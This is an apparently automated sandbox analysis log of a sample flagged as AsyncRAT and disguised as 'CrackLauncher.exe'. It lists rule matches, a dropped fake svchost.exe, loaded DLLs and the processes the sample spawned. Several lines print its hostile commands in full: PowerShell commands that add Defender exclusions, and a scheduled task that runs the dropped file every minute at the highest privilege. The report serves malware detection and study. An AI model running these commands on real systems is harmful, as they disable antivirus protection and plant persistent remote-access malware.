                      barindex
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Source: a9YMw44iQq.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\ProgramData\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD348861160_2_00007FFD34886116
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD348891890_2_00007FFD34889189
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD348872D20_2_00007FFD348872D2
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD348816D90_2_00007FFD348816D9
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD348823E10_2_00007FFD348823E1
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD348821450_2_00007FFD34882145
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD3488C1E00_2_00007FFD3488C1E0
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD3488959A0_2_00007FFD3488959A
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeCode function: 0_2_00007FFD3488AC550_2_00007FFD3488AC55
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A9FFB2_2_00007FFD348A9FFB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A8E052_2_00007FFD348A8E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A8F4A2_2_00007FFD348A8F4A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348A27852_2_00007FFD348A2785
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34972E112_2_00007FFD34972E11
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348B25ED5_2_00007FFD348B25ED
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348B8EFA5_2_00007FFD348B8EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34899E7D8_2_00007FFD34899E7D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3489947D8_2_00007FFD3489947D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34898E058_2_00007FFD34898E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD348A5EFA11_2_00007FFD348A5EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD348A8F2A11_2_00007FFD348A8F2A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD348AB9FA11_2_00007FFD348AB9FA
                      Source: C:\ProgramData\svchost.exeCode function: 15_2_00007FFD348916D915_2_00007FFD348916D9
                      Source: C:\ProgramData\svchost.exeCode function: 15_2_00007FFD34890FF815_2_00007FFD34890FF8
                      Source: C:\ProgramData\svchost.exeCode function: 15_2_00007FFD3489214515_2_00007FFD34892145
                      Source: C:\ProgramData\svchost.exeCode function: 16_2_00007FFD348B16D916_2_00007FFD348B16D9
                      Source: C:\ProgramData\svchost.exeCode function: 16_2_00007FFD348B0FF816_2_00007FFD348B0FF8
                      Source: C:\ProgramData\svchost.exeCode function: 16_2_00007FFD348B214516_2_00007FFD348B2145
                      Source: C:\ProgramData\svchost.exeCode function: 17_2_00007FFD348B16D917_2_00007FFD348B16D9
                      Source: C:\ProgramData\svchost.exeCode function: 17_2_00007FFD348B0FF817_2_00007FFD348B0FF8
                      Source: C:\ProgramData\svchost.exeCode function: 17_2_00007FFD348B214517_2_00007FFD348B2145
                      Source: C:\ProgramData\svchost.exeCode function: 18_2_00007FFD348C16D918_2_00007FFD348C16D9
                      Source: C:\ProgramData\svchost.exeCode function: 18_2_00007FFD348C0FF818_2_00007FFD348C0FF8
                      Source: C:\ProgramData\svchost.exeCode function: 18_2_00007FFD348C214518_2_00007FFD348C2145
                      Source: C:\ProgramData\svchost.exeCode function: 19_2_00007FFD348B16D919_2_00007FFD348B16D9
                      Source: C:\ProgramData\svchost.exeCode function: 19_2_00007FFD348B0FF819_2_00007FFD348B0FF8
                      Source: a9YMw44iQq.exe, 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCrackLauncher.exe4 vs a9YMw44iQq.exe
                      Source: a9YMw44iQq.exeBinary or memory string: OriginalFilenameCrackLauncher.exe4 vs a9YMw44iQq.exe
                      Source: a9YMw44iQq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: a9YMw44iQq.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\ProgramData\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: a9YMw44iQq.exe, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: a9YMw44iQq.exe, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: a9YMw44iQq.exe, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchost.exe.0.dr, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchost.exe.0.dr, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: svchost.exe.0.dr, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: a9YMw44iQq.exe, Bf13MrTgh7zf0ag.csBase64 encoded string: 'ml4fj+TR+1eXKF5wbGywI0vn8uX23GwIvzDcpH3VT04QjOdGsI++LZT/1+ltN8VO'
                      Source: svchost.exe.0.dr, Bf13MrTgh7zf0ag.csBase64 encoded string: 'ml4fj+TR+1eXKF5wbGywI0vn8uX23GwIvzDcpH3VT04QjOdGsI++LZT/1+ltN8VO'
                      Source: svchost.exe.0.dr, KTFdTAhBe0nkVRO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: svchost.exe.0.dr, KTFdTAhBe0nkVRO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: a9YMw44iQq.exe, KTFdTAhBe0nkVRO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: a9YMw44iQq.exe, KTFdTAhBe0nkVRO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@21/21@2/3
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                      Source: C:\ProgramData\svchost.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeMutant created: \Sessions\1\BaseNamedObjects\1WuAENfHx9TxfyQ1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                      Source: a9YMw44iQq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: a9YMw44iQq.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: a9YMw44iQq.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeFile read: C:\Users\user\Desktop\a9YMw44iQq.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\a9YMw44iQq.exe "C:\Users\user\Desktop\a9YMw44iQq.exe"
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
                      Source: unknownProcess created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
                      Source: unknownProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                      Source: unknownProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                      Source: unknownProcess created: C:\ProgramData\svchost.exe C:\ProgramData\svchost.exe
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
